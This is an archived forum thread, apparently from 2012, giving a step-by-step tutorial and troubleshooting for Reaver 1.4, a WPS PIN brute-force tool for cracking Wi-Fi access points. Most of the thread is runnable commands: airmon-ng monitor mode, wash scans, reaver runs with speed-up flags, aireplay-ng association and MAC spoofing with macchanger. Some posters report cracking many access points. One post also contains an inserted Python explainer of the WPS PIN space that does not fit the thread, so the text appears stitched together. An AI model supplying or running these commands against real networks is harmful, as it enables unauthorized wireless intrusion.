Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial



MartinBishop
01-21-2012, 05:06 AM
http://maurisdump.blogspot.com/2012/01/reaver-14-wps-bruteforcing-tool-upgrade.html

Prerequisites

You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.

Basic Usage

First, make sure your wireless card is in monitor mode:

# airmon-ng start wlan0

Then start ./wash -i mon0 to scan for valid Wi-Fi networks.

To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):

# reaver -i mon0 -b 00:01:02:03:04:05

You will probably also want to use -vv to get verbose info about Reaver's progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack

By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

robbo1985
02-02-2012, 01:02 PM
Used this tool before. I was lucky and it cracked my WPS in 2 hours; it only got to around 10% to 15% before it cracked it. On most computers I'm guessing it will take around 6 - 12 hours to crack the WPS.

Tool worth adding.

TAPE
02-04-2012, 05:32 AM
I was having good results with v1.3, however was having difficulty with v1.4;
it was not associating with my test router whereas v1.3 was associating fine.

My work around was associating with aireplay-ng and running reaver with the -A switch;

So in 1 terminal window:

aireplay-ng mon0 -1 120 -b 00:11:22:33:55 -e ESSID

In another terminal window:

reaver -i mon0 -A -c XX -b 00:11:22:33:44:55 -v

Am still running through it, however so far so good.

VulpiArgenti
02-04-2012, 08:19 AM
Genius TAPE - this is the first time I've managed to get Reaver working.
.
(Small typo in the first code line: "-b" should be "-a" I think).

zimmaro
02-04-2012, 10:08 AM
From the (bottom) of my experience I think that version 1.3 works better than 1.4 (I ran the same "SIMPLE-test" in the same "situation" with the two versions); only v1.3 passed the tests :)
Bye

TAPE
02-04-2012, 11:32 AM
Genius TAPE - this is the first time I've managed to get Reaver working.
.
(Small typo in the first code line: "-b" should be "-a" I think).


Yeah think you are right ;) I always get confused with which switch to use in aireplay ;)

I am currently running it like this on a VMware image of BT5R1 and so far so good ;
http://adaywithtape.blogspot.com/2012/01/cracking-wpa-using-wps-vulnerability.html

I will amend the blogpost later to have the -a switch correctly mentioned after testing complete ;)

TAPE
02-04-2012, 11:34 AM
Damn this double post syndrome...

VulpiArgenti
02-04-2012, 06:42 PM
Yes, I don't know what's going on with the forum software. I currently have no "go advanced" or formatting tools; my posts luk iliturat :(

djolej
02-16-2012, 07:07 PM
From the (bottom) of my experience I think that version 1.3 works better than 1.4 (I ran the same "SIMPLE-test" in the same "situation" with the two versions); only v1.3 passed the tests :)
Bye

I keep getting "WARNING: Receive timeout occurred" and I can't get it to start. Does anyone know how to fix this? I tried wash, and -d 15 :P Has this anything to do with the 1.4 version?

TheEnd
05-17-2012, 04:59 AM
http://i45.tinypic.com/20igfht.jpg

it's stuck on that for about half an hour, What seems to be the problem ?
Note: Same pin, and same percentage for half an hour...

Eatme
05-23-2012, 06:51 AM
*This worked for me

airmon-ng stop mon0                  # or wlan0, whichever is currently up
ifconfig wlan0 down
macchanger -a wlan0                  # copy mac (note the new MAC it prints)
airmon-ng start wlan0 11             # 11 = AP channel
ifconfig mon0 down
macchanger -m "paste same mac" mon0
ifconfig wlan0 up
ifconfig mon0 up

Open a new tab/window/terminal:
aireplay-ng mon0 -1 120 -a BSSID -e ESSID    # let it run

reaver -i mon0 -A -b BSSID -v -d 1 -x 30 -l 600

- -d 1 can be -d 0 (0 might be too fast; if it is, add -l 60 or 120)
- play around with -x 30 as well; I manage to get 5-20+ keys/second without any errors

*This worked for me

http://i.imgur.com/eWDfB.jpg

dombera
05-24-2012, 07:20 AM
Hi Eatme! Thanks for the info!
I was wondering if you could post your conkyrc file, as I like your config a lot? ;)

Eatme
05-24-2012, 10:32 AM
Hi Eatme! Thanks for the info!
I was wondering if you could post your conkyrc file, as I like your config a lot? ;)

hey, np!

and thanks :cool: , but I can't seem to find my conkyrc file... I'm guessing I don't have it installed.

Eatme
05-24-2012, 04:12 PM
I'm guessing the lower the (xx seconds/pin) is, the faster it's cracking, or is it the higher they are..

I'm trying to test out some different commands to make it crack the fastest without errors, or trying the same pin.

The highest I have it at is (10-20 seconds/pin).

longjidin
05-30-2012, 12:06 AM
I am using this method; it takes between 2 and 10 hours depending on the PIN. Correct me if I am wrong.... :rolleyes:
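The hour-scale figures in robbo1985's and longjidin's posts follow from how small the WPS PIN space really is. The following Python is an added illustration, not code from this thread or from the Reaver project: it implements the checksum digit defined by the WPS specification (weights 3,1,3,1,3,1,3 over the first seven digits) and bounds the worst-case attack time from a seconds-per-PIN figure like the ones quoted above. The mapping of Reaver's percentage to elapsed time assumes the percentage is attempts out of 11,000; the seconds-per-PIN values are only the thread's own numbers.

```python
"""Why a WPS PIN falls in hours: the PIN space is 11,000, not 10**8.

Added example, not part of the original thread or of Reaver.  Facts used:
 * a WPS PIN is 8 decimal digits and the 8th is a checksum of the other 7
   (WPS specification), so only 10**7 PIN values are valid at all;
 * the registrar exchange confirms the first 4 digits separately from the
   last 3 + checksum, so the two halves can be searched one after the other:
   at most 10**4 + 10**3 = 11,000 attempts instead of 10**7.
"""

WEIGHTS = (3, 1, 3, 1, 3, 1, 3)  # checksum weights for the 7 leading digits


def wps_checksum_digit(seven_digits: int) -> int:
    """Checksum digit that completes a 7-digit WPS PIN body."""
    if not 0 <= seven_digits < 10**7:
        raise ValueError("PIN body must be 7 decimal digits")
    digits = [int(d) for d in f"{seven_digits:07d}"]
    total = sum(w * d for w, d in zip(WEIGHTS, digits))
    return (10 - total % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if an 8-digit PIN string carries the correct checksum digit."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum_digit(int(pin[:7])) == int(pin[7])


def naive_search_space() -> int:
    """Valid PINs an AP would have to be tried against if it only ever
    answered right/wrong for the PIN as a whole."""
    return 10**7


def split_search_space() -> int:
    """Attempts needed when the AP confirms the two halves separately:
    10**4 for the first half, then 10**3 for the second half (the 8th
    digit is forced by the checksum, so it adds nothing)."""
    return 10**4 + 10**3


def worst_case_hours(seconds_per_pin: float) -> float:
    """Upper bound on attack time for a given per-attempt cost."""
    return split_search_space() * seconds_per_pin / 3600


def hours_at_progress(seconds_per_pin: float, percent_complete: float) -> float:
    """Elapsed time implied by a progress percentage, assuming (as this
    example does) that the percentage is attempts / 11,000."""
    return worst_case_hours(seconds_per_pin) * percent_complete / 100


if __name__ == "__main__":
    # Constructed sample: the thread quotes 1 s/pin (default delay) and
    # 10-20 s/pin as observed rates.
    for spp in (1.0, 10.0, 20.0):
        print(f"{spp:4.0f} s/pin -> worst case {worst_case_hours(spp):6.1f} h "
              f"(would be {naive_search_space() * spp / 3600:,.0f} h "
              f"without the split confirmation)")
    print("12345670 valid:", is_valid_pin("12345670"))
```

The takeaway for a network owner is that the 11,000-attempt bound does not depend on the WPA2 passphrase at all, so a strong passphrase does not help; the fix is to disable the WPS PIN (external registrar) method on the AP. A lockout after failed attempts only stretches the timeline, as the -l and -d discussion in this thread shows.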

viper606
06-13-2012, 12:18 PM
*This worked for me

airmon-ng stop mon0                  # or wlan0, whichever is currently up
ifconfig wlan0 down
macchanger -a wlan0                  # copy mac (note the new MAC it prints)
airmon-ng start wlan0 11             # 11 = AP channel
ifconfig mon0 down
macchanger -m "paste same mac" mon0
ifconfig wlan0 up
ifconfig mon0 up

Open a new tab/window/terminal:
aireplay-ng mon0 -1 120 -a BSSID -e ESSID    # let it run

reaver -i mon0 -A -b BSSID -v -d 1 -x 30 -l 600

- -d 1 can be -d 0 (0 might be too fast; if it is, add -l 60 or 120)
- play around with -x 30 as well; I manage to get 5-20+ keys/second without any errors

*This worked for me

http://i.imgur.com/eWDfB.jpg

What is meant by "copy mac": the MAC of the wireless card or the MAC of the AP?

viper606
06-13-2012, 12:25 PM
macchanger -a wlan0                  # copy mac

What is meant by "copy mac": is it the MAC of the wireless card or the MAC of the AP?

hannah
07-11-2012, 05:09 PM
I was having good results with v1.3, however was having difficulty with v1.4;
it was not associating with my test router whereas v1.3 was associating fine.

My work around was associating with aireplay-ng and running reaver with the -A switch;

So in 1 terminal window:

aireplay-ng mon0 -1 120 -b 00:11:22:33:55 -e ESSID

In another terminal window:

reaver -i mon0 -A -c XX -b 00:11:22:33:44:55 -v

Am still running through it, however so far so good.


Apologies for quoting this old comment.
What is the reason for running

aireplay-ng mon0 -1 120 -b 00:11:22:33:55 -e ESSID

simultaneously with reaver in another terminal, please?

I have been able to crack many WPS enabled APs just with this command:

reaver -i mon0 -b BSSID -c 7 -x 60 -a -f -vv

Question 1: What is the need for the aireplay-ng command in another terminal?
Question 2: Can you run reaver 1.4 and reaver 1.3 in the same BT installation, please?

Kind regards always :)

TAPE
07-11-2012, 06:02 PM
1) The reason for me running the aireplay command was due to reaver not functioning as it should
on the installation I had at that time. Not sure what the error was that necessitated that, but it
was a work around that worked at the time.
With a later install on the later released BT5R2 it was no longer required for me.
It was a fix that was required only when reaver was not correctly associating on my setup, if it works
'out of the box' for you then no need to even consider it.

2) Actually, I don't think you can with the normal install procedures, as one will overwrite the other..

hannah
07-11-2012, 06:16 PM
2) Actually, I don't think you can with the normal install procedures, as one will overwrite the other..

Got that.. I am having a lot of issues lately with reaver 1.4..

In your opinion, do you think reaver 1.3 is better, please?

TAPE
07-12-2012, 01:40 AM
I have to go with v1.4 running on BT5R2.. when I last tested it, it really blasted through my test router.